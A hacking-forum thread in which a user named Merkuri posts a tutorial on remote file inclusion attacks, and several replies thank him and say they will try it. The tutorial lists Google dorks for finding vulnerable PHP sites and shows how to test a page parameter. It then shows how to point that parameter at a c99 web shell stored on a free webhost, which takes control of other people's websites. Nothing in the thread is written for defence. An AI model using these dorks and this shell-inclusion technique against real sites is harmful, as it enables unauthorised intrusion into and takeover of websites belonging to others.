[Merkuri]

I haven't see tutorial about RFI here so I decide to write one
You will need shell and free webhost that won't delete your account for the shell
http://www.7host.com this is the host i recommend you can try cwahi.com but the last time they have delete my account

You will need dorks to find vulnerable site which is hard those days ;(
here are some

Code:

inurl:.php?link=
allinurl:.php?link=
inurl:.php?redirect=
allinurl:.php?redirect=
inurl:.php?page=
allinurl:.php?page=
inurl:.php?webpage=
allinurl:.php?webpage=

What is RFI

Code:

Remote File Inclusion(RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

-Wikipedia

To test site for vulnerability after = write http://google.com if google load then the site is vulnerable
Example

Code:

http://www.site.com/index.php?page=web.php

TEST

http://www.site.com/index.php?page=http://google.com

To exploit the vulnerability you just need to replace google with address to your shell

Example

Code:

My shell link for example
http://www.host.com/c99.asp

http://www.site.com/index.php?page=http://www.host.com/c99.asp

And if the site is vulnerable your shell will be loaded

Its realy hard to find RFI since PHP5'5 update many pipl say that its 'death'

[Mugetsu.]

Nice share mate. This was really helpful.

[Crimson]

I'll try this out sometime. Thanks for the share.

[Bannedshee]

nice gunna try this it mmight take time...

[Crow_SL]

Nice tutorial, keep it up!
I would like to see more tutorials in hacking section...

[shizelkid]

Do you need a paid web host or will a free one work!?!?!

[Merkuri]

Do you need a paid web host or will a free one work!?!?!

For the shell ? free will do the job but they may delete your account